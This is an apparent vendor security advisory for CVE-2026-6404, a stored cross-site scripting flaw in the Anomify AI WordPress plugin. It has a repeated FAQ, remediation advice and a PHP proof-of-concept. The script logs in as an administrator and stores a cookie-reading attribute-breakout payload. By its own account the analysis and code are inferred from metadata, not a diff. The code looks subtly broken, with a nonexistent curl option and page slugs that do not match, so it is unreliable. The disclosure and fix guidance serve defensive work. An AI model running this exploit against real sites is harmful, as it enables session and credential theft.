What is CVE-2026-6404?

CVE-2026-6404 is a stored cross-site scripting (XSS) vulnerability in the Anomify AI plugin for WordPress, affecting versions up to and including 0.3.6. It allows authenticated attackers with administrator-level access to inject arbitrary scripts through the ‘anomify_api_key’ parameter.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization. The plugin uses sanitize_text_field() on the ‘anomify_api_key’ input, which does not encode double-quote characters. This allows attackers to inject scripts that execute when the settings page is accessed by any user.

Who is affected by this vulnerability?

WordPress sites using the Anomify AI plugin version 0.3.6 or earlier are affected. Specifically, authenticated users with administrator privileges can exploit this vulnerability, potentially affecting all users who visit the settings page.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Anomify AI plugin installed. If it is version 0.3.6 or earlier, and you have administrator access, your site is susceptible to this vulnerability.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, credential theft, or unauthorized actions under the victim’s session. Since the injected script executes for all users visiting the settings page, the impact can extend to all site users.

How can I fix CVE-2026-6404?

To fix this vulnerability, update the Anomify AI plugin to the latest version that addresses the issue. Additionally, ensure that the plugin uses proper sanitization functions like esc_attr() when outputting values in HTML attributes.

What does the CVSS score of 4.4 indicate?

A CVSS score of 4.4 indicates a medium severity level. This suggests that while the vulnerability requires specific conditions to be exploited (such as administrator access), it poses a significant risk due to potential impacts on the entire WordPress site.

What is stored cross-site scripting (XSS)?

Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored and executed when users access the affected page. This can lead to various attacks, including data theft and unauthorized actions.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can log in as an administrator, submit a malicious payload in the ‘anomify_api_key’ field, and cause the script to execute when the settings page is loaded. This demonstrates the ease of exploitation given administrator access.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Anomify AI plugin until a fix is applied. Additionally, review user permissions and limit administrator access to trusted individuals to reduce the risk of exploitation.

What are the best practices for preventing similar vulnerabilities?

To prevent similar vulnerabilities, always validate and sanitize user inputs properly, use appropriate escaping functions when outputting data, and keep all plugins and themes updated. Regular security audits can also help identify potential issues before they are exploited.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 20, 2026

CVE-2026-6404: Anomify AI <= 0.3.6 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'anomify_api_key' Parameter (anomify)

CVE ID CVE-2026-6404

Plugin anomify

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 0.3.6

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6404 (metadata-based): CVE-2026-6404 describes a stored cross-site scripting vulnerability in the Anomify AI plugin (versions 0.3.6 and earlier). The vulnerability allows authenticated attackers with Administrator-level access to inject arbitrary scripts through the ‘anomify_api_key’ parameter, which is stored via the WordPress options API and later rendered unsafely on the plugin’s settings page. The CVSS score is 4.4 (Medium), with a vector that indicates high attack complexity, high privileges required, but a scope change due to the cross-site scripting nature.

Root Cause: The plugin uses sanitize_text_field() on the ‘anomify_api_key’ input before saving it as a WordPress option via update_option(). sanitize_text_field() strips HTML tags but does not encode double-quote characters. When the stored value is later output directly inside an HTML attribute context (value=”…”) without esc_attr(), an attacker can break out of the attribute value by including an unescaped double-quote in the saved data. This is classic stored XSS (CWE-79). Atomic Edge analysis infers this pattern based on the vulnerability description and common WordPress plugin mistakes; no code diff is available for confirmation.

Exploitation: An attacker with Administrator-level access navigates to the plugin settings page (likely under /wp-admin/options-general.php?page=anomify or Settings > Anomify AI in the admin menu). The attacker submits the settings form with the ‘anomify_api_key’ parameter containing a payload such as: x”onfocus=”alert(document.cookie)”autofocus=”1. The sanitize_text_field() function preserves double-quotes, so the stored value becomes: x”onfocus=”alert(document.cookie)”autofocus=”1. When the plugin renders the settings page, it echoes the value directly into a text input field: . The injected event handler (onfocus) executes when the page loads and the input receives focus (via autofocus). No AJAX or REST endpoint is involved; the attack goes through the standard WordPress admin POST handler (admin-post.php or options API form submission).

Remediation: The fix requires two changes. First, the plugin must use a filtering function that encodes double-quotes, such as wp_kses() or esc_attr_raw() before saving the option, or avoid using sanitize_text_field() for data that will be placed in HTML attributes. Second, and more critically, the plugin must apply esc_attr() to the value when outputting it inside the HTML attribute context (value=”…”). This would convert double-quotes to " and prevent attribute injection. The plugin should also consider using WordPress settings API with register_setting() which can handle proper sanitization and escaping.

Impact: Successful exploitation allows an Administrator to inject arbitrary JavaScript or HTML into the plugin’s settings page. Because this is a stored XSS, the injected script executes whenever any user (including other Administrators or users with lower privileges) visits the affected settings page. The attack can lead to session hijacking, credential theft (by capturing admin cookies or form submissions), or further administrative actions under the victim’s session (such as creating rogue admin accounts or installing malicious plugins). The CVSS scope change (S:C) indicates the impact extends beyond the vulnerable component, potentially affecting the entire WordPress site.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6404 - Anomify AI <= 0.3.6 - Authenticated (Administrator+) Stored Cross-Site Scripting

<?php
/*
 * This PoC demonstrates exploitation of CVE-2026-6404.
 * Assumptions:
 * - The plugin stores the API key in a WordPress option (e.g., 'anomify_api_key').
 * - The settings page is accessible at /wp-admin/options-general.php?page=anomify-settings or similar.
 * - The vulnerable input field is named 'anomify_api_key'.
 * - The attacker has valid administrator credentials.
 */

$target_url = 'https://example.com';  // CHANGE THIS to the target WordPress site
$admin_user = 'admin';                 // CHANGE THIS to a valid administrator username
$admin_pass = 'password';             // CHANGE THIS to the administrator password

// Step 1: Log in to get admin cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $admin_user,
    'pwd' => $admin_pass,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

if (curl_error($ch)) {
    die('Login failed: ' . curl_error($ch) . "n");
}

// Step 2: Get the settings page to extract the _wpnonce and _wp_http_referer
$settings_url = $target_url . '/wp-admin/options-general.php?page=anomify-settings';
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_GET, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);

// Extract nonce and other hidden fields (simplified; real extraction requires HTML parsing)
// For this PoC, assume we found the nonce value from the form
preg_match('/<input type="hidden" id="_wpnonce" name="_wpnonce" value="([^"]+)"[^>]*>/', $response, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';

// Step 3: Submit the malicious payload via the plugin's settings form
// The payload breaks out of the value attribute using a double-quote
$payload = 'x"onfocus="alert(document.cookie)"autofocus="true';

$post_data = array(
    'option_page' => 'anomify-settings-group',
    'action' => 'update',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/options-general.php?page=anomify-settings',
    'anomify_api_key' => $payload,
    'submit' => 'Save Changes'
);

$update_url = $target_url . '/wp-admin/options.php';
curl_setopt($ch, CURLOPT_URL, $update_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

if (curl_error($ch)) {
    die('Payload submission failed: ' . curl_error($ch) . "n");
}

// Step 4: Verify by fetching the settings page again and checking if payload is stored
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_GET, true);
$response = curl_exec($ch);

if (strpos($response, 'x"onfocus="alert(document.cookie)"autofocus="true') !== false) {
    echo "[+] Exploit successful! Payload is stored and will execute on the settings page.n";
    echo "[+] Visit: $settings_url to trigger the XSS.n";
} else {
    echo "[-] Could not verify payload storage. Check settings page manually.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6404?
Overview of the vulnerability
CVE-2026-6404 is a stored cross-site scripting (XSS) vulnerability in the Anomify AI plugin for WordPress, affecting versions up to and including 0.3.6. It allows authenticated attackers with administrator-level access to inject arbitrary scripts through the ‘anomify_api_key’ parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization. The plugin uses sanitize_text_field() on the ‘anomify_api_key’ input, which does not encode double-quote characters. This allows attackers to inject scripts that execute when the settings page is accessed by any user.
Who is affected by this vulnerability?
Impacted users and systems
WordPress sites using the Anomify AI plugin version 0.3.6 or earlier are affected. Specifically, authenticated users with administrator privileges can exploit this vulnerability, potentially affecting all users who visit the settings page.
How can I check if my site is vulnerable?
Identifying affected installations
To check if your site is vulnerable, verify the version of the Anomify AI plugin installed. If it is version 0.3.6 or earlier, and you have administrator access, your site is susceptible to this vulnerability.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to session hijacking, credential theft, or unauthorized actions under the victim’s session. Since the injected script executes for all users visiting the settings page, the impact can extend to all site users.
How can I fix CVE-2026-6404?
Recommended remediation steps
To fix this vulnerability, update the Anomify AI plugin to the latest version that addresses the issue. Additionally, ensure that the plugin uses proper sanitization functions like esc_attr() when outputting values in HTML attributes.
What does the CVSS score of 4.4 indicate?
Understanding the severity rating
A CVSS score of 4.4 indicates a medium severity level. This suggests that while the vulnerability requires specific conditions to be exploited (such as administrator access), it poses a significant risk due to potential impacts on the entire WordPress site.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored and executed when users access the affected page. This can lead to various attacks, including data theft and unauthorized actions.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can log in as an administrator, submit a malicious payload in the ‘anomify_api_key’ field, and cause the script to execute when the settings page is loaded. This demonstrates the ease of exploitation given administrator access.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Anomify AI plugin until a fix is applied. Additionally, review user permissions and limit administrator access to trusted individuals to reduce the risk of exploitation.
What are the best practices for preventing similar vulnerabilities?
Security recommendations
To prevent similar vulnerabilities, always validate and sanitize user inputs properly, use appropriate escaping functions when outputting data, and keep all plugins and themes updated. Regular security audits can also help identify potential issues before they are exploited.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations